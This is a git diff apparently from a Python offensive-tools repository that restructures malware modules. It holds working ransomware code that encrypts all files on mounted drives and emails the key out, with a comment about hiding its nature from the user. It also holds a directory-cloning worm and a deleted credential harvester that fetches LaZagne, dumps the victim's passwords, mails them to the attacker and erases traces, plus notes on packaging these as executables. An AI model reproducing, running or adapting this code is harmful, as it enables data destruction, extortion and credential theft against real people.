None)}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ.get("OS", None)}\n\n' # report KEY to the attacker using email - if gmail!=None and passwd!=None and self.send_mail(mail=gmail, password=passwd): + if email != None and passwd != None and send_mail(email=email, password=passwd, receiver_mail=email, smtp_server=smtp_server, smtp_port=smtp_port): pass else: # print error message and exit if key is not sent @@ -26,23 +27,6 @@ def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: else: self.PATHS = paths - - def send_mail(self, mail, password)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - message = f'Subject: RNSMWARE ATTK has been initialized on {environ["COMPUTERNAME"]}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ["OS"]}\n\n' - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except Exception as e: - return False - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -52,7 +36,6 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - def encrypt_file(self, file_path): try: # read file data @@ -69,28 +52,13 @@ def encrypt_file(self, file_path): except Exception: return False - - - def encrypt_files(self, path:str): + + def encrypt_files(self, path: str): for root, dirs, files in walk(path): for file in files: file_path = join(root, file) self.encrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.encrypt_files(path) - - -if __name__ == '__main__': - # Print some meaningful text, so that user don't suspect program as ransomeware - print('[*] Loading...') - - # Specify paths to be encrypted - PATHS = [r'path_to_be_encrypted',] - - # don't pass PATHS if all the drives are to be encrypted - encrypter = DMSECEncrypter(PATHS, gmail='yourgmailid', passwd='yourapppassword') - encrypter.start() - print('[*] Completed') diff --git a/pyhtools/malwares/wireless_password_harvester/__init__.py b/pyhtools/evil_files/worms/__init__.py similarity index 100% rename from pyhtools/malwares/wireless_password_harvester/__init__.py rename to pyhtools/evil_files/worms/__init__.py diff --git a/pyhtools/worms/dir_cloner.py b/pyhtools/evil_files/worms/dir_cloner.py similarity index 89% rename from pyhtools/worms/dir_cloner.py rename to pyhtools/evil_files/worms/dir_cloner.py index f791ed0..8952daf 100644 --- a/pyhtools/worms/dir_cloner.py +++ b/pyhtools/evil_files/worms/dir_cloner.py @@ -134,21 +134,4 @@ def clone_dir(self, times:int=1000, start_after:int=0, src:str=None, dst:str=Non time.sleep(start_after) for iteration in range(times): threading.Thread(target=self.clone, args=(iteration, src, dst)).start() - - -if __name__=='__main__': - dir_worm = DirCloner() - path = dir_worm.get_curr_drive_folder() - - if dir_worm.set_clone_path(path): - # print(f"[*] Clone path : {path}") - pass - else: - # print(f"[!] Failed to set new clone path {path}") - pass - - # for specific folder - dir_worm.clone_dir(times=1, start_after=0) - - # for specific folder and its subfolder - dir_worm.clone_all_dirs(times=1, start_after=0, path=path) \ No newline at end of file + \ No newline at end of file diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py new file mode 100644 index 0000000..b2a31c2 --- /dev/null +++ b/pyhtools/executable_generator/generator.py @@ -0,0 +1,50 @@ +''' +module: generator.py +description: generates evil files using specified payload and type +''' +from enum import Enum +# from subprocess import check_call, check_output + + +# TODO: convert all evil files modules into classes +# create new class object with parameters and generate +# evil file using specified compiler using subprocess + + +class CompileOptions(Enum): + PYINTALLER = 0 + NUITKA = 1 + + +class Generator: + def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None: + self.__type = _type + self.__payload = payload + self.__compiler = compiler + + self.__options = { + 'malwares': [ + 'credential_harvester', + 'keylogger', + 'http_reverse_backdoor', + 'tcp_reverse_backdoor', + 'telegram_data_harvester', + 'telegram_remote_code_executor', + 'wireless_password_harvester' + ], + 'ransomwares': [ + 'dmsec', + ], + 'worms': [ + 'dir_cloner' + ], + } + + def verify(): + pass + + def show_options(): + pass + + def generate_file(): + pass diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py deleted file mode 100644 index e060667..0000000 --- a/pyhtools/executable_generator/utils.py +++ /dev/null @@ -1,2 +0,0 @@ -from pyhtools.UI.colors import * - diff --git a/pyhtools/malwares/credential_harvester/credential_harvester.py b/pyhtools/malwares/credential_harvester/credential_harvester.py deleted file mode 100644 index cf63495..0000000 --- a/pyhtools/malwares/credential_harvester/credential_harvester.py +++ /dev/null @@ -1,72 +0,0 @@ -#!usr/bin/env python -import smtplib, requests, os, tempfile, subprocess, zipfile -import malwares.send_mail.send_mail as mail - -def send_mail(mail, password, message)->bool: - ''' - description: sends mail to self using gmail smtp. - params: mail, password, message - returns: bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -def download(url:str)->bool: - ''' - description: downloads file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as dfile: - dfile.write(response.content) - return True - except Exception as e: - print('[-] Exception : ', e) - return False - - -def run(email, password): - ''' - starts collecting data and report to specified email. - ''' - tmp_dir = tempfile.gettempdir() - os.chdir(tmp_dir) - # download LaZagne - download(r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip') - with zipfile.ZipFile('Windows.zip', 'r') as zip_file: - zip_file.extractall(tmp_dir) - - os.chdir('Windows') - recovered_report = subprocess.call('laZagne_x86.exe all') - print(recovered_report) - - report = subprocess.check_output('lazagne.exe all -vv') - msg = 'Subject: Credential Harvester Report.\n' + report - mail.send_mail_to(email, email, password, msg) - - # remove traces - cwd = os.getcwd() - for file in os.listdir(cwd): - file_dir = os.path.join(cwd,file) - os.remove(file_dir) - - os.chdir('..') - os.rmdir('Windows') - os.remove('Windows.zip') - - -if __name__ == '__main__': - run('youremail@gmail.com', 'yourpassword') - \ No newline at end of file diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py deleted file mode 100644 index f1f29b2..0000000 --- a/pyhtools/malwares/downloader/downloader.py +++ /dev/null @@ -1,18 +0,0 @@ -import requests - -def download(url:str)->bool: - ''' - description: download and save file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as file: - file.write(response.content) - return True - - except Exception as e: - print('[-] Exception : ', e) - return False diff --git a/pyhtools/malwares/send_mail/how to.txt b/pyhtools/malwares/send_mail/how to.txt deleted file mode 100644 index 801d5d9..0000000 --- a/pyhtools/malwares/send_mail/how to.txt +++ /dev/null @@ -1,6 +0,0 @@ -refer this video tutorial: https://www.youtube.com/watch?v=ql5Dex4m40w - -Steps: -1. Turn on 2FA -2. Go to GoogleAcc->Security->AppPassword->Custom -3. Copy generated key and use that as password \ No newline at end of file diff --git a/pyhtools/malwares/send_mail/send_mail.py b/pyhtools/malwares/send_mail/send_mail.py deleted file mode 100644 index ea6915f..0000000 --- a/pyhtools/malwares/send_mail/send_mail.py +++ /dev/null @@ -1,33 +0,0 @@ -import smtplib - - -def send_mail_to(mail, receiver_mail: str , password, message)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, receiver_mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -if __name__=='__main__': - msg = '''Subject: This is a test mail - Dear User, - This is a test message. - ''' - gmail = 'your@gmail.com' - password = 'password' - receivers = 'list of emails' - - # mail to self - send_mail_to(gmail, gmail, password, msg) - - # mail to others - send_mail_to(gmail, receivers, password, msg) diff --git a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt b/pyhtools/malwares/wireless_password_harvester/HowToUse.txt deleted file mode 100644 index aecc52f..0000000 --- a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt +++ /dev/null @@ -1,4 +0,0 @@ -HOW to use: -1. Update email id and password -2. Turn on less secure app: https://myaccount.google.com/lesssecureapps -3. Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py \ No newline at end of file diff --git a/pyhtools/ransomwares/__init__.py b/pyhtools/ransomwares/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/ransomwares/dmsec/__init__.py b/pyhtools/ransomwares/dmsec/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/worms/__init__.py b/pyhtools/worms/__init__.py deleted file mode 100644 index e69de29..0000000